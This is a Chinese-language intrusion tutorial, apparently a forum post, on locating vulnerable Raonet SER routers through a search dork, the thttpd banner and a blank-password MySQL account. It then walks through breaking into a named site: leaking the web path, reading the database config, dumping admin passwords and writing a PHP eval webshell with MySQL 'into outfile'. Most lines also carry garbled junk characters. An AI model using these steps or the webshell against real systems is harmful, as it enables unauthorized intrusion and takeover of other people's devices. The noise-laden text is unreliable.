寻找存在漏洞的路由器方法:
7 m8 f3 {) n2 i6 Y, w& S
/ E& q, |5 R$ A) r' b: _- \1:google搜索'Raonet Subscriber Ethernet Router'0 H7 L/ b- @' ]
" O. s% z3 S) `6 K
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
1 @. m: v- x0 j; g+ B
- d; S/ C4 P; H3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
: K4 s0 ]4 i6 ]# M' E) r3 y" X4 B) w
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......" e' W' S2 F+ I6 H
2 _; |, u$ z" C
& K b* J1 y/ P! M( s/ B% L; T0 p, i7 T; M# K
入侵步骤:( z% H: w' i( y7 s
( c& ]6 i H: [# d7 t0 M5 F0 S: r+ a2 B) t1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
3 {% T6 M: s0 d) W" a
, h, n1 D9 V) Y, S2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
( \4 h$ H& X- w% X! _3:得到密码后连接,查看GUI管理密码:
' z( b: J, H+ A/ J9 H6 @# F! x' Buse ser_500% p: G! I# g' C
select id,passwd from user;0 o$ U8 |6 {1 H/ Q
4:通过数据库写入webshell,执行命令:
$ C# A" ^) r/ E: luse mysql;2 x$ N& r. i6 P8 o1 b
create table ok(cmd TEXT);
u3 c$ R8 [5 D& pinsert into ok values("<?php @eval($_POST[cmd])?>");- p, L. y% Z; D3 R
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
0 v0 }" N9 b: B1 Ydrop table ok;
9 v5 p% U3 |1 Y6 i% J+ o) m- D. ] R8 y! f) |- S
5:连接后门shell.php
$ C. F) ^3 W3 ^4 ~& _9 k4 @9 z' K
4 e* R! _# }' w6 s" V6. 搞定!) N9 d" q" r/ F$ v K/ U. @/ K
) Y) k" k0 g* \( d1 x/ Z
|